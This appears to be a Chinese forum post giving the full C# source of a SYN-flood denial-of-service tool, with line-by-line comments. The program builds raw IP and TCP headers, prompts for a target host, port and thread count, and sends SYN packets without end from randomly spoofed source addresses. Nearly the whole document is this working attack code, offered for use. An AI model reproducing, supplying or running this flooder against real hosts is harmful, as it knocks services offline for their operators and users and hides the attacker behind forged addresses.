C# DDOS攻擊代碼

1. //在工程屬性中設置"允許不安全代碼"為true
2. ?using System;
3. using System.Net;
4. using System.Net.Sockets;
5. using System.Threading;
6. //需要的命名空間不用解釋了吧
7. namespace syn
8. {
9.     public struct ipHeader
10.     {
11.         public byte ip_verlen; //4位首部長度+4位IP版本號
12.         public byte ip_tos; //8位服務類型TOS
13.         public ushort ip_totallength; //16位數據包總長度（字節）
14.         public ushort ip_id; //16位標識
15.         public ushort ip_offset; //3位標志位
16.         public byte ip_ttl; //8位生存時間 TTL
17.         public byte ip_protocol; //8位協議(TCP, UDP, ICMP, Etc.)
18.         public ushort ip_checksum; //16位IP首部校驗和
19.         public uint ip_srcaddr; //32位源IP地址
20.         public uint ip_destaddr; //32位目的IP地址
21.     }
22.     public struct psdHeader
23.     {
24.         public uint saddr; //源地址
25.         public uint daddr; //目的地址
26.         public byte mbz;
27.         public byte ptcl; //協議類型
28.         public ushort tcpl; //TCP長度
29.     }
30.     public struct tcpHeader
31.     {
32.         public ushort th_sport; //16位源端口
33.         public ushort th_dport; //16位目的端口
34.         public int th_seq; //32位序列號
35.         public uint th_ack; //32位確認號
36.         public byte th_lenres; //4位首部長度/6位保留字
37.         public byte th_flag; //6位標志位
38.         public ushort th_win; //16位窗口大小
39.         public ushort th_sum; //16位校驗和
40.         public ushort th_urp; //16位緊急數據偏移量
41.     }
42.     //這3個是ip首部tcp偽首部tcp首部的定義。
43.     public class syn
44.     {
45.         private uint ip;
46.         private ushort port;
47.         private EndPoint ep;
48.         private Random rand;
49.         private Socket sock;
50.         private ipHeader iph;
51.         private psdHeader psh;
52.         private tcpHeader tch;
53.         public UInt16 checksum(UInt16[] buffer, int size)
54.         {
55.             Int32 cksum = 0;
56.             int counter;
57.             counter = 0;
58. ?
59.             while (size > 0)
60.             {
61.                 UInt16 val = buffer[counter];
62. ?
63.                 cksum += Convert.ToInt32(buffer[counter]);
64.                 counter += 1;
65.                 size -= 1;
66.             }
67. ?
68.             cksum = (cksum >> 16) + (cksum & 0xffff);
69.             cksum += (cksum >> 16);
70.             return (UInt16)(~cksum);
71.         }
72.         //這個使用來計算校驗碼的我照抄c#實現ping那文章的方法，反正ip協議計算校驗碼方法都一樣
73.         public syn(uint _ip, ushort _port, EndPoint _ep, Random _rand)
74.         {
75.             ip = _ip;
76.             port = _port;
77.             ep = _ep;
78.             rand = _rand;
79.             ipHeader iph = new ipHeader();
80.             psh = new psdHeader();
81.             tch = new tcpHeader();
82.             sock = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.IP);
83.             sock.SetSocketOption(SocketOptionLevel.IP, SocketOptionName.HeaderIncluded, 1);
84.             //這2個挺重要，必須這樣才可以自己提供ip頭
85.         }
86.         //傳參數的多線程需要用到代構造函數的對象。
87.         static void Main(string[] args)
88.         {
89.             Console.WriteLine("1、輸入攻擊ip或域名");
90.             try
91.             {
92.                 IPHostEntry pe = Dns.GetHostByName(Console.ReadLine());
93.                 uint ip = Convert.ToUInt32(pe.AddressList[0].Address);//這是要攻擊的ip並轉為網絡字節序
94.                 Console.WriteLine("2、輸入攻擊端口");
95.                 ushort port = ushort.Parse(Console.ReadLine());
96.                 IPEndPoint ep = new IPEndPoint(pe.AddressList[0], port);
97.                 byte[] bt = BitConverter.GetBytes(port);
98.                 Array.Reverse(bt);
99.                 port = BitConverter.ToUInt16(bt, 0);
100.                 //要攻擊的端口也得轉為網絡字節序，必須是16位0－65535，如果用hosttonetworkorder就轉成32位的了，無奈這樣
101.                 Console.WriteLine("3、輸入攻擊線程，最多50個");
102.                 int xiancheng = Int32.Parse(Console.ReadLine());
103.                 if (xiancheng < 1 || xiancheng > 50)
104.                 {
105.                     Console.WriteLine("必須在1到50之間");
106.                     return;
107.                 }
108.                 Random rand = new Random();
109.                 Thread[] t = new Thread[xiancheng];
110.                 syn[] sy = new syn[xiancheng];
111.                 for (int i = 0; i < xiancheng; i++)
112.                 {
113.                     sy[i] = new syn(ip, port, ep, rand);
114.                     t[i] = new Thread(new ThreadStart(sy[i].synFS));
115.                     t[i].Start();
116.                 }
117.                 //一個線程對應一個對象，不知多個線程對應同一個對象行不行，請指點。基礎不行啊
118.             }
119.             catch
120.             {
121.                 Console.WriteLine("有錯誤，請檢查是不是連在網上，或者輸入是否都正確");
122.                 return;
123.             }
124. ?
125. ?
126.         }
127.         unsafe public void synFS()
128.         {
129.             iph.ip_verlen = (byte)(4 << 4 | sizeof(ipHeader) / sizeof(uint));
130.             //ipv4，20字節ip頭，這個固定就是69
131.             iph.ip_tos = 0;
132.             //這個0就行了
133.             iph.ip_totallength = 0x2800;
134.             //這個是ip頭+tcp頭總長，40是最小長度，不帶tcp option，應該是0028但是還是網絡字節序所以倒過來成了2800
135.             iph.ip_id = 0x9B18;
136.             //這個我是攔截ie發送。直接添上來了
137.             iph.ip_offset = 0x40;
138.             //這個也是攔截ie的
139.             iph.ip_ttl = 64;
140.             //也是攔截ie的，也可以是128什么的。
141.             iph.ip_protocol = 6;
142.             //6就是tcp協議
143.             iph.ip_checksum = UInt16.Parse("0");
144.             //沒計算之前都寫0
145.             iph.ip_destaddr = ip;
146.             //ip頭的目標地址就是要攻擊的地址，上面傳過來的。
147.             psh.daddr = iph.ip_destaddr;
148.             //偽tcp首部用於校驗的，上面是目的地址，和ip的那個一樣。
149.             psh.mbz = 0;
150.             //這個據說0就行
151.             psh.ptcl = 6;
152.             //6是tcp協議
153.             psh.tcpl = 0x1400;
154.             //tcp首部的大小，20字節，應該是0014，還是字節序原因成了1400
155.             tch.th_dport = port;
156.             //攻擊端口號，上面傳過來的
157.             tch.th_ack = 0;
158.             //第一次發送所以沒有服務器返回的序列號，為0
159.             tch.th_lenres = (byte)((sizeof(tcpHeader) / 4 << 4 | 0));
160.             //tcp長度
161.             tch.th_flag = 2;
162.             //2就是syn
163.             tch.th_win = ushort.Parse("16614");
164.             //攔截ie的
165.             tch.th_sum = UInt16.Parse("0");
166.             //沒計算之前都為0
167.             tch.th_urp = UInt16.Parse("0");
168.             //這個連ip都是0，新的攻擊方法有改這個值的
169.             while (true)
170.             {
171.                 iph.ip_srcaddr = Convert.ToUInt32(IPAddress.Parse(rand.Next(1, 255) + "." + rand.Next(1, 255) + "." + rand.Next(1, 255) + "." + rand.Next(1, 255)).Address);
172.                 psh.saddr = iph.ip_srcaddr;
173.                 ushort duankou = Convert.ToUInt16(rand.Next(1, 65535));
174.                 byte[] bt = BitConverter.GetBytes(duankou);
175.                 Array.Reverse(bt);
176.                 tch.th_sport = BitConverter.ToUInt16(bt, 0);
177.                 tch.th_seq = IPAddress.HostToNetworkOrder((int)rand.Next(-2147483646, 2147483646));
178.                 //上面用隨機種子隨機產生源ip源端口和tcp序列號並轉為網絡字節序
179. ?
180. iph.ip_checksum = 0;
181.                 tch.th_sum = 0;
182.                 //因為循環中，所以每次必須把這2個已有數的清0才可計算
183.                 byte[] psh_buf = new byte[sizeof(psdHeader)];
184.                 Int32 index = 0;
185.                 index = pshto(psh, psh_buf, sizeof(psdHeader));
186.                 if (index == -1)
187.                 {
188.                     Console.WriteLine("構造tcp偽首部錯誤");
189.                     return;
190.                 }
191.                 index = 0;
192.                 byte[] tch_buf = new byte[sizeof(tcpHeader)];
193.                 index = tchto(tch, tch_buf, sizeof(tcpHeader));
194.                 if (index == -1)
195.                 {
196.                     Console.WriteLine("構造tcp首部錯誤1");
197.                     return;
198.                 }
199.                 index = 0;
200.                 byte[] tcphe = new byte[sizeof(psdHeader) + sizeof(tcpHeader)];
201.                 Array.Copy(psh_buf, 0, tcphe, index, psh_buf.Length);
202.                 index += psh_buf.Length;
203.                 Array.Copy(tch_buf, 0, tcphe, index, tch_buf.Length);
204.                 index += tch_buf.Length;
205.                 tch.th_sum = chec(tcphe, index);
206.                 index = 0;
207.                 index = tchto(tch, tch_buf, sizeof(tcpHeader));
208.                 if (index == -1)
209.                 {
210.                     Console.WriteLine("構造tcp首部錯誤2");
211.                     return;
212.                 }
213.                 index = 0;
214.                 byte[] ip_buf = new byte[sizeof(ipHeader)];
215.                 index = ipto(iph, ip_buf, sizeof(ipHeader));
216.                 if (index == -1)
217.                 {
218.                     Console.WriteLine("構造ip首部錯誤1");
219.                     return;
220.                 }
221.                 index = 0;
222.                 byte[] iptcp = new byte[sizeof(ipHeader) + sizeof(tcpHeader)];
223.                 Array.Copy(ip_buf, 0, iptcp, index, ip_buf.Length);
224.                 index += ip_buf.Length;
225.                 Array.Copy(tch_buf, 0, iptcp, index, tch_buf.Length);
226.                 index += tch_buf.Length;
227.                 iph.ip_checksum = chec(iptcp, index);
228.                 index = 0;
229.                 index = ipto(iph, ip_buf, sizeof(tcpHeader));
230.                 if (index == -1)
231.                 {
232.                     Console.WriteLine("構造ip首部錯誤2");
233.                     return;
234.                 }
235.                 index = 0;
236.                 Array.Copy(ip_buf, 0, iptcp, index, ip_buf.Length);
237.                 index += ip_buf.Length;
238.                 Array.Copy(tch_buf, 0, iptcp, index, tch_buf.Length);
239.                 index += tch_buf.Length;
240.                 if (iptcp.Length != (sizeof(ipHeader) + sizeof(tcpHeader)))
241.                 {
242.                     Console.WriteLine("構造iptcp報文錯誤");
243.                     return;
244.                 }
245.                 //上面這一大堆東西就是計算校驗和的方法了，方法是
246.                 //1、建立一個字節數組，前面放tcp偽首部后面放tcp首部，然后計算，確定最終tcp部分的校驗和
247.                 //2、把確定了校驗和地tcp首部重新生成字節數組，這是就不加tcp偽首部了，所以工20字節
248.                 //3、建40字節字節數組，前面放ip首部，后面放tcp首部，校驗，確定最終ip部分校驗和
249.                 //4、最后把確定了ip校驗和的ip部分和tcp部分先后放入40字節的字節數組中，就是要發送的buffer[]了，就是這么麻煩
250.                 try
251.                 {
252. ?
253.                     sock.SendTo(iptcp, ep);
254.                     //構造發送字節數組總是麻煩，發送就簡單了，socket.sendto就可以了
255. ?
256.                 }
257.                 catch
258.                 {
259.                     Console.WriteLine("發送錯誤");
260.                     return;
261.                 }
262. ?
263. ?
264.             }
265. ?
266.         }
267.         public UInt16 chec(byte[] buffer, int size)
268.         {
269.             Double double_length = Convert.ToDouble(size);
270.             Double dtemp = Math.Ceiling(double_length / 2);
271.             int cksum_buffer_length = Convert.ToInt32(dtemp);
272.             UInt16[] cksum_buffer = new UInt16[cksum_buffer_length];
273.             int icmp_header_buffer_index = 0;
274.             for (int i = 0; i < cksum_buffer_length; i++)
275.             {
276.                 cksum_buffer[i] =
277.                  BitConverter.ToUInt16(buffer, icmp_header_buffer_index);
278.                 icmp_header_buffer_index += 2;
279.             }
280.             UInt16 u_cksum = checksum(cksum_buffer, cksum_buffer_length);
281.             return u_cksum;
282.         }
283.         //這個是計算校驗，把那些類型不一樣的全轉為16位字節數組用的
284.         public Int32 ipto(ipHeader iph, byte[] Buffer, int size)
285.         {
286.             Int32 rtn = 0;
287.             int index = 0;
288.             byte[] b_verlen = new byte[1];
289.             b_verlen[0] = iph.ip_verlen;
290.             byte[] b_tos = new byte[1];
291.             b_tos[0] = iph.ip_tos;
292.             byte[] b_totallen = BitConverter.GetBytes(iph.ip_totallength);
293.             byte[] b_id = BitConverter.GetBytes(iph.ip_id);
294.             byte[] b_offset = BitConverter.GetBytes(iph.ip_offset);
295.             byte[] b_ttl = new byte[1];
296.             b_ttl[0] = iph.ip_ttl;
297.             byte[] b_protol = new byte[1];
298.             b_protol[0] = iph.ip_protocol;
299.             byte[] b_checksum = BitConverter.GetBytes(iph.ip_checksum);
300.             byte[] b_srcaddr = BitConverter.GetBytes(iph.ip_srcaddr);
301.             byte[] b_destaddr = BitConverter.GetBytes(iph.ip_destaddr);
302.             Array.Copy(b_verlen, 0, Buffer, index, b_verlen.Length);
303.             index += b_verlen.Length;
304.             Array.Copy(b_tos, 0, Buffer, index, b_tos.Length);
305.             index += b_tos.Length;
306.             Array.Copy(b_totallen, 0, Buffer, index, b_totallen.Length);
307.             index += b_totallen.Length;
308.             Array.Copy(b_id, 0, Buffer, index, b_id.Length);
309.             index += b_id.Length;
310.             Array.Copy(b_offset, 0, Buffer, index, b_offset.Length);
311.             index += b_offset.Length;
312.             Array.Copy(b_ttl, 0, Buffer, index, b_ttl.Length);
313.             index += b_ttl.Length;
314.             Array.Copy(b_protol, 0, Buffer, index, b_protol.Length);
315.             index += b_protol.Length;
316.             Array.Copy(b_checksum, 0, Buffer, index, b_checksum.Length);
317.             index += b_checksum.Length;
318.             Array.Copy(b_srcaddr, 0, Buffer, index, b_srcaddr.Length);
319.             index += b_srcaddr.Length;
320.             Array.Copy(b_destaddr, 0, Buffer, index, b_destaddr.Length);
321.             index += b_destaddr.Length;
322.             if (index != size/* sizeof(IcmpPacket) */)
323.             {
324.                 rtn = -1;
325.                 return rtn;
326.             }
327. ?
328.             rtn = index;
329.             return rtn;
330. ?
331.         }
332.         //這個是把ip部分轉為字節數組用的
333.         public Int32 pshto(psdHeader psh, byte[] buffer, int size)
334.         {
335.             Int32 rtn;
336.             int index = 0;
337.             byte[] b_psh_saddr = BitConverter.GetBytes(psh.saddr);
338.             byte[] b_psh_daddr = BitConverter.GetBytes(psh.daddr);
339.             byte[] b_psh_mbz = new byte[1];
340.             b_psh_mbz[0] = psh.mbz;
341.             byte[] b_psh_ptcl = new byte[1];
342.             b_psh_ptcl[0] = psh.ptcl;
343.             byte[] b_psh_tcpl = BitConverter.GetBytes(psh.tcpl);
344.             Array.Copy(b_psh_saddr, 0, buffer, index, b_psh_saddr.Length);
345.             index += b_psh_saddr.Length;
346.             Array.Copy(b_psh_daddr, 0, buffer, index, b_psh_daddr.Length);
347.             index += b_psh_daddr.Length;
348.             Array.Copy(b_psh_mbz, 0, buffer, index, b_psh_mbz.Length);
349.             index += b_psh_mbz.Length;
350.             Array.Copy(b_psh_ptcl, 0, buffer, index, b_psh_ptcl.Length);
351.             index += b_psh_ptcl.Length;
352.             Array.Copy(b_psh_tcpl, 0, buffer, index, b_psh_tcpl.Length);
353.             index += b_psh_tcpl.Length;
354.             if (index != size)
355.             {
356.                 rtn = -1;
357.                 return rtn;
358.             }
359.             else
360.             {
361.                 rtn = index;
362.                 return rtn;
363.             }
364. ?
365.         }
366.         //這個是把tcp偽首部轉為字節數組用的
367.         public Int32 tchto(tcpHeader tch, byte[] buffer, int size)
368.         {
369.             Int32 rtn;
370.             int index = 0;
371.             byte[] b_tch_sport = BitConverter.GetBytes(tch.th_sport);
372.             byte[] b_tch_dport = BitConverter.GetBytes(tch.th_dport);
373.             byte[] b_tch_seq = BitConverter.GetBytes(tch.th_seq);
374.             byte[] b_tch_ack = BitConverter.GetBytes(tch.th_ack);
375.             byte[] b_tch_lenres = new byte[1];
376.             b_tch_lenres[0] = tch.th_lenres;
377.             byte[] b_tch_flag = new byte[1];
378.             b_tch_flag[0] = tch.th_flag;
379.             byte[] b_tch_win = BitConverter.GetBytes(tch.th_win);
380.             byte[] b_tch_sum = BitConverter.GetBytes(tch.th_sum);
381.             byte[] b_tch_urp = BitConverter.GetBytes(tch.th_urp);
382.             Array.Copy(b_tch_sport, 0, buffer, index, b_tch_sport.Length);
383.             index += b_tch_sport.Length;
384.             Array.Copy(b_tch_dport, 0, buffer, index, b_tch_dport.Length);
385.             index += b_tch_dport.Length;
386.             Array.Copy(b_tch_seq, 0, buffer, index, b_tch_seq.Length);
387.             index += b_tch_seq.Length;
388.             Array.Copy(b_tch_ack, 0, buffer, index, b_tch_ack.Length);
389.             index += b_tch_ack.Length;
390.             Array.Copy(b_tch_lenres, 0, buffer, index, b_tch_lenres.Length);
391.             index += b_tch_lenres.Length;
392.             Array.Copy(b_tch_flag, 0, buffer, index, b_tch_flag.Length);
393.             index += b_tch_flag.Length;
394.             Array.Copy(b_tch_win, 0, buffer, index, b_tch_win.Length);
395.             index += b_tch_win.Length;
396.             Array.Copy(b_tch_sum, 0, buffer, index, b_tch_sum.Length);
397.             index += b_tch_sum.Length;
398.             Array.Copy(b_tch_urp, 0, buffer, index, b_tch_urp.Length);
399.             index += b_tch_urp.Length;
400.             if (index != size)
401.             {
402.                 rtn = -1;
403.                 return rtn;
404.             }
405.             else
406.             {
407.                 rtn = index;
408.                 return rtn;
409.             }
410.         }
411.         //這個是把tcp部分轉為字節數組用的，因為這個要用到2次就不把這個和偽首部放一塊了。
412.     }
413. }  

原文鏈接：http://bbs.isbase.net/thread-44524-1-1.html